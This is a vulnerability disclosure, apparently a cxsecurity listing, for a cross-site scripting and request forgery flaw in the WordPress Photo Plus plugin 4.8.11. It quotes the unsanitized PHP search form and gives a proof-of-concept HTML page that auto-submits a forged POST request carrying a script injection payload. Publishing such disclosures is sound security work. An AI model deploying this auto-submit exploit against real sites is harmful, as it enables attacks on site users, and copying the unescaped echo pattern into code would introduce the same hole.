WordPress Photo Plus & Photo Search XSS & CSRF

2012.12.31
Credit: k3170makan
Risk: Low
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-79
CWE-352

# Exploit Title: Word Press Photo Plus, Photo Search XSS/CSRF Vulnerability # Google Dork: # Date: 29/12/12 # Exploit Author: k3170makan # Vendor Homepage: http://wordpress.org/extend/plugins/wp-photo-album-plus/ # Software Link: http://wordpress.org/extend/plugins/wp-photo-album-plus/ # Version: 4.8.11 # Tested on: Ubuntu 10.04 Word Press Photo Plus plugin suffers from a XSS/CSRF via Vulnerability in the "Search Photos" function Code: extract from wp-photo-album-plus.php, in widget function -------------------------------------------------------------------------------------------------------------------------------- 42 <form id="wppa_searchform" action="<?php echo($pagelink) ?>" method="post" class="widget_search"> 43 <div> 44 <?php echo $instance['label'] ?> 45 <input type="text" name="wppa-searchstring" id="wppa_s" value="<?php echo $wppa[ 'searchstring'] ?>" /> 46 <input id = "wppa_searchsubmit" type="submit" value="<?php _e('Search', 'wppa'); ?>" /> 47 </div> --------------------------------------------------------------------------------------------------------------------------------- The above code fails to sanitize the $wppa['searchstring'] variable, allowing attacks to inject harmfull HTML elements and JavaScript code. Submissions to this form can also be made from any domain, which actually aids in the exploitation of the vulnerability thus this is classified as a CSRF Vulnerability Exploit Code: The exploit requires an attacker to forge a post request to this form, this can be done by using the following html page -------------------------------------------------------------------------------------------------------------------------------- 1 <html> 2 <body onload="xss()"> 3 <form name="f" id="wppa_searchform" action="http://[domain name]/[photo search page path]" method="post" class="widget_search"> 4 <input type="text" name="wppa-searchstring" id="wppa_s" value='"><script>alert(1);</script><textarea>'> 5 <input name="s" id="wppa_searchsubmit" type="submit" value="Search"> 6 </form> 7 <script> 8 function xss(){ 9 document.f.s.click(); 10 } 11 </script> 12 <body> 13 <html> -------------------------------------------------------------------------------------------------------------------------------- [photo search page path] can be obtained by reading the path set in the original photo search form attributes -- <Keith k3170makan <http://about.me/k3170makan> Makan/>

References:

http://wordpress.org/extend/plugins/wp-photo-album-plus/


See this note in RAW Version
Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top